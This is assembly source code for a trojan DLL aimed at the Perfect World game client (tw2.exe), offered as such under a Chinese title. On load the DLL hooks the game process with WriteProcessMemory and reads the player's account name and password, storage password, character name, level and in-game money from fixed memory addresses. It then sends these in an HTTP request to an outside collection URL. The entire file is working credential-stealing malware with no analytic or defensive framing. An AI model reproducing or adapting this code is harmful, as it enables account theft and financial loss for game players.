完美世界木马DLL部分汇编代码

; Dll.asm
; 用来被嵌入到其它进程执行的测试 dll
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff DLL.asm
; Link  /subsystem:windows /Dll DLL.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .386
  .model flat, stdcall
  option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include  windows.inc
include  user32.inc
includelib user32.lib
include  kernel32.inc
includelib kernel32.lib
include  libc.inc
includelib libc.lib
include  Wininet.inc
includelib Wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .data?
hProcess dd ?
dwMoney  dd ?
dwLevel  dd ?
dwTemp1  dd ?
hSession dd ?
hRequest dd ?

  .data
szBuf  db 0,0,0,0,0,0,0,0,0,0
szServer1 db 20 dup ( 0 )
szServer2 db 20 dup ( 0 )
szFileName db 260 dup ( 0 )
szTargetName db 'tw2.exe',0
szAgent  db 'WinInet',0
szUrl  db 'http://www.79725.com/tx/lin.asp',0
szMailFmt db '%s?s=%s&u=%s&p=%s&sp=%s&r=%s&l=%d&m=%d',0
szBuf_Url db 260 dup (0)

szUserName db 30 dup ( 0 )
szPassWord db 30 dup ( 0 )
szStoragePW db 30 dup ( 0 )
szPlayerName db 60 dup ( 0 )
szPlayerName1 db 60 dup ( 0 )

  .const
szConfirm db 'confirm',0
szUnKnown db 'UnKnown',0
szNum1  db '1',0

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .code

;szUserName 
;szPassWord 
;szStoragePW 
;szPlayerName
;%s?s=%s&u=%s&p=%s&sp=%s&r=%s&l=%d&m=%d
_SendMail1 proc
  invoke InternetOpenA,offset szAgent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
  mov hSession, eax

  invoke wsprintf,offset szBuf_Url,offset szMailFmt,offset szUrl,offset szUnKnown,offset szUserName,offset szPassWord, \
     offset szUnKnown,offset szUnKnown,dwLevel,dwMoney

  invoke  InternetOpenUrlA, hSession, offset szBuf_Url, 0, 0, INTERNET_FLAG_RELOAD, 0
  ret
_SendMail1 Endp

_SendMail2 proc
  invoke InternetOpenA,offset szAgent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
  mov hSession, eax

  invoke wsprintf,offset szBuf_Url,offset szMailFmt,offset szUrl,offset szServer1,offset szUserName,offset szPassWord, \
     offset szUnKnown,offset szPlayerName1, dwLevel, dwMoney

  invoke  InternetOpenUrlA, hSession, offset szBuf_Url, 0, 0, INTERNET_FLAG_RELOAD, 0
  ret
_SendMail2 Endp

;-------------------------------------------------------------------------------

GetStoragePW proc
  .if ebx == ebp  
   mov ebp, offset szConfirm
   .if dword ptr [ebx] == 666e6f63h
    invoke RtlZeroMemory,offset szStoragePW,sizeof szStoragePW
    pushad
    mov esi, offset szStoragePW
    mov al, [edi]
    .while( al )
     mov [esi], al
     inc edi
     inc esi
     mov al, [edi]
    .endw
    popad
    invoke CreateThread,NULL,0,offset _SendMail1, NULL, 0,         0
   .endif
  .endif
  ret
GetStoragePW Endp

;金钱：[[[8e4dbc]+1c]+20]+4FC
;等级：[[[8e4dbc]+1c]+20]+448
;名字: [[[[8e4dbc]+1c]+20]+5c8]
GetPlayerInfo proc
  mov esi, 08e4dbch
  mov esi, [esi]
  mov esi, [esi+01ch]
  mov esi, [esi+020h]
  add esi, 04FCh
  mov ebp, [esi]
  mov dwMoney,ebp
  
  sub esi, 04FCh
  add esi, 0448h
  mov ebp, [esi]
  mov dwLevel,ebp

  sub esi, 0448h
  add esi, 05C8h
  mov ebp, [esi]

  push eax
  mov esi, offset szPlayerName
  mov ax, [ebp]
  .while( ax )
   mov [esi], ax
   inc ebp
   inc esi
   mov ax, [ebp]
  .endw

  mov ebp, 008E5754h
  mov esi, offset szServer1
  mov ax, [ebp]
  .while( ax )
   mov [esi], ax
   inc ebp
   inc esi
   mov ax, [ebp]
  .endw

  ;invoke WideCharToMultiByte, CP_ACP, 0, offset szServer1, -1, 0,   0,  0, 0
  ;invoke WideCharToMultiByte, CP_ACP, 0, offset szServer1, -1, offset szServer2, eax, 0, 0

  invoke WideCharToMultiByte, CP_ACP, 0, offset szPlayerName, -1, 0,   0,  0, 0
  invoke WideCharToMultiByte, CP_ACP, 0, offset szPlayerName, -1, offset szPlayerName1, eax, 0, 0
  invoke CreateThread,NULL,0,offset _SendMail2, NULL, 0,         0
  pop eax
  
  pop     esi
  pop     ebp
  retn    4

GetPlayerInfo Endp

 

_SleepThread proc _lParam
  invoke Sleep, 600000
  mov eax, 1
  ret
_SleepThread Endp

GetUserNameAndPassWord proc
  invoke RtlZeroMemory,offset szUserName,sizeof szUserName
  invoke RtlZeroMemory,offset szPassWord,sizeof szPassWord
;---------------------------------------------------
  pushad
  mov ebp, [01E6FDECh]
  mov esi, offset szUserName
  mov al, [ebp]
  .while( al )
   mov [esi], al
   inc ebp
   inc esi
   mov al, [ebp]
  .endw

  mov ebp, edx
  mov esi, offset szPassWord
  mov al, [ebp]
  .while( al )
   mov [esi], al
   inc ebp
   inc esi
   mov al, [ebp]
  .endw
  
  invoke CreateThread,NULL,0,offset _SendMail1, NULL, 0,         0
  popad
;----------------------------------------------------
  retn
GetUserNameAndPassWord Endp

 

;>>>>>>>>>>>>>>>>>>>>>>>>>
DllEntry proc _hInstance,_dwReason,_dwReserved
  pushad
  .if _dwReason == DLL_PROCESS_ATTACH
   invoke MessageBox, NULL, offset szNum1, NULL, MB_ICONINFORMATION
   invoke GetModuleFileName, 0, offset szFileName, 0103h
   invoke strrchr, offset szFileName, 05Ch
   inc eax
   invoke _strcmpi, eax, offset szTargetName

   .if eax == 0
    mov eax, offset szBuf
    mov byte ptr [eax], 0E9h
    ;mov ebx, offset GetStoragePW
    ;sub ebx, 00459A29h
    ;mov dword ptr [eax+1], ebx
    invoke GetCurrentProcess
    mov hProcess, eax
    ;invoke WriteProcessMemory, eax, 00459A24h, offset szBuf, 5, 0
    
    ;mov eax, offset szBuf
    ;mov ebx, offset GetPlayerInfo
    ;sub ebx, 0044E816h
    ;mov dword ptr [eax+1], ebx
    ;invoke WriteProcessMemory, hProcess, 0044E811h, offset szBuf, 5, 0

    mov eax, offset szBuf
    mov ebx, offset GetUserNameAndPassWord
    sub ebx, 006DB3CDh
    mov dword ptr [eax+1], ebx
    invoke WriteProcessMemory, hProcess, 006DB3C8h, offset szBuf, 5, 0
 
    invoke CreateThread,NULL,0,offset _SleepThread,NULL, CREATE_SUSPENDED, 0
    
   .endif
   
  .endif
  popad
  mov eax,TRUE
  ret

DllEntry Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  End DllEntry